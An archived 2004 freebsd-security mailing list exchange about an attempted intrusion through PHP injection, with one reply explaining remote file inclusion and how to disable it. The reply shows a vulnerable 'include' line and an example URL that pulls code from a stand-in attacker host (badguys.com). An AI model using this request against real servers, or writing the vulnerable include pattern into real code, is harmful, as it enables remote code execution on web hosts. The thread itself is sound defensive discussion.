OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: FreeBSD-SA-04:13.linux in the wild

From: Gustavo A. Baratto (gbarattosuperb.net)
Date: Wed Aug 11 2004 - 16:23:58 CDT

I think I may have seen such thing before as well... not a freebsd problem
though... It's php's own fault.
php comes with url_fopen enabled by default, so if someone write a
script.php with something like:
include ("$var");

One could call the
http://goodguys.com/script.php?var=http://badguys.com/malicious_script.txt

the text of malicious_script.php hosted remotely would be included in
scrip.php, and any arbitrary code would be executed with www privileges.

just disabling url_fopen in php.ini would prevent that.

If this is not what you have seen, please, I'd like to know more about it.

Thank you ;)

----- Original Message -----
From: "Ryan Thompson" <ryansasknow.com>
To: <freebsd-securityfreebsd.org>
Sent: Wednesday, August 11, 2004 2:07 PM
Subject: FreeBSD-SA-04:13.linux in the wild

>
> Has anyone else seen this in the wild?
>
> We just had an attempted attack yesterday from a live attacker on one of
> our machines using this vulnerability. It wasn't all that clever, and
> they're long gone, but I *did* manage to catch them in the act and grab
> a copy of the binary they tried to run from /tmp/, as well as the PHP
> injection code they used to subvert a virtual web site's poorly-written
> index.php script to execute commands as a local user.
>
> Their first order of business was uname -a, and the timing of the
> requests appeared to be random and experimental ("cd /tmp; ls -la", a
> few times). If any FreeBSD.org developers would like more information,
> I'd be happy to share my findings and log output off-list.
>
> - Ryan
>
> --
> Ryan Thompson <ryansasknow.com>
>
> SaskNow Technologies - http://www.sasknow.com
> 901-1st Avenue North - Saskatoon, SK - S7K 1Y4
>
> Tel: 306-664-3600 Fax: 306-244-7037 Saskatoon
> Toll-Free: 877-727-5669 (877-SASKNOW) North America
> _______________________________________________
> freebsd-securityfreebsd.org mailing list
> http://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to
"freebsd-security-unsubscribefreebsd.org"
>

_______________________________________________
freebsd-securityfreebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscribefreebsd.org"